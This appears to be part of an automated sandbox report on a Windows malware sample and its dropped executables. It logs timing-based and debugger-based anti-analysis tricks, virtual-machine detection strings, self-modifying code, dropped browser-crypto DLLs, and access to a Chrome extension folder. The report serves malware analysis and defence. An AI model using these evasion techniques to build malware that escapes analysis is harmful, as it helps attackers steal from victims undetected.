Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0016A second address: D001AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E8h 0x00000007 jmp 00007FF0BC8515E7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF0BC8515DFh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D001AE second address: D001B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D009F4 second address: D00A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF0BC8515D6h 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f jl 00007FF0BC8515D8h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D00A0B second address: D00A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF0BCB462BEh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D00A23 second address: D00A3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FF0BC8515D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D00A3B second address: D00A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007FF0BCB462B6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D00D96 second address: D00D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D01F40 second address: D01F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D039CA second address: D039CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D08042 second address: D0806A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0BCB462C5h 0x00000008 jmp 00007FF0BCB462BFh 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 jns 00007FF0BCB462B6h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0806A second address: D08079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF0BC8515D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D08079 second address: D08081 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D08081 second address: D08088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0C7D5 second address: D0C7F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0C7F5 second address: D0C7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CCB8DB second address: CCB8DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0BEB1 second address: D0BED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF0BC8515D6h 0x0000000e jmp 00007FF0BC8515E9h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0BED8 second address: D0BEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0C4DF second address: D0C4EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FF0BC8515D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0C4EB second address: D0C505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF0BCB462C4h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0C6AC second address: D0C6BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DAh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0F99D second address: D0F9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0F9A3 second address: D0F9DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jl 00007FF0BC8515EEh 0x00000013 jmp 00007FF0BC8515E8h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007FF0BC8515D8h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D0F9DC second address: D0FA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edx 0x0000000b jmp 00007FF0BCB462C7h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007FF0BCB462C8h 0x0000001a pop eax 0x0000001b jmp 00007FF0BCB462BDh 0x00000020 push 71AA9882h 0x00000025 pushad 0x00000026 push esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D101D1 second address: D101DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF0BC8515D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D10B3F second address: D10B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D10B43 second address: D10B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FF0BC8515D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 movsx esi, di 0x00000027 xchg eax, ebx 0x00000028 jmp 00007FF0BC8515DAh 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push edi 0x00000031 jmp 00007FF0BC8515E6h 0x00000036 pop edi 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D110C7 second address: D110E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF0BCB462C6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D11B44 second address: D11B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: D11B48 second address: D11B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B5E933 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D01DB3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B5C422 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D2DB8F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D93962 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: B5E933 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: D01DB3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: B5C422 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: D2DB8F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: D93962 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Special instruction interceptor: First address: 8A3B15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Special instruction interceptor: First address: 8A3BBD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Special instruction interceptor: First address: A4D06A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Special instruction interceptor: First address: A70591 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Special instruction interceptor: First address: ACF690 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Special instruction interceptor: First address: 6D3B15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Special instruction interceptor: First address: 6D3BBD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Special instruction interceptor: First address: 87D06A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Special instruction interceptor: First address: 8A0591 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Special instruction interceptor: First address: 8FF690 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_054E0C1C rdtsc 0_2_054E0C1C
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Window / User API: threadDelayed 2064
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe API coverage: 0.3 %
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7736 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7732 Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7732 Thread sleep time: -64032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7696 Thread sleep count: 274 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7696 Thread sleep time: -8220000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7720 Thread sleep time: -60030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7812 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7712 Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7712 Thread sleep time: -68034s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7728 Thread sleep time: -60030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7716 Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7716 Thread sleep time: -64032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7696 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe TID: 8000 Thread sleep count: 116 > 30
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe TID: 8000 Thread sleep time: -696000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe TID: 8168 Thread sleep count: 2064 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Thread sleep count: Count: 2064 delay: -10
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8EC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 7_2_6C8EC930
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: explorti.exe, explorti.exe, 00000006.00000002.2880337631.0000000000CE5000.00000040.00000001.01000000.00000007.sdmp, eb98fe5174.exe, eb98fe5174.exe, 00000007.00000002.2620268585.0000000000A2C000.00000040.00000001.01000000.00000009.sdmp, 53c7d901f1.exe, 00000008.00000002.2648279906.000000000085C000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1732026554.0000000001624000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: explorti.exe, 00000006.00000002.2882067749.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp, 53c7d901f1.exe, 00000008.00000002.2653239563.0000000001023000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: eb98fe5174.exe, 00000007.00000002.2639639180.0000000001024000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW*
Source: file.exe, 00000000.00000002.1731373345.0000000000CE5000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1764865027.0000000000CE5000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1765716826.0000000000CE5000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000006.00000002.2880337631.0000000000CE5000.00000040.00000001.01000000.00000007.sdmp, eb98fe5174.exe, 00000007.00000002.2620268585.0000000000A2C000.00000040.00000001.01000000.00000009.sdmp, 53c7d901f1.exe, 00000008.00000002.2648279906.000000000085C000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorti.exe, 00000006.00000002.2882067749.0000000001579000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: 53c7d901f1.exe, 00000008.00000002.2653239563.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(l
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_054E0621 Start: 054E0A73 End: 054E05E9 6_2_054E0621
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe File opened: NTICE
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe File opened: SICE
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_054E0C1C rdtsc 0_2_054E0C1C
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C935FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 7_2_6C935FF0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8D3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 7_2_6C8D3480
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B2645B mov eax, dword ptr fs:[00000030h] 6_2_00B2645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B2A1C2 mov eax, dword ptr fs:[00000030h] 6_2_00B2A1C2
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C90B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_6C90B66C
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C90B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_6C90B1F7
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CABAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_6CABAC62
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: eb98fe5174.exe PID: 7864, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 53c7d901f1.exe PID: 7996, type: MEMORYSTR
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
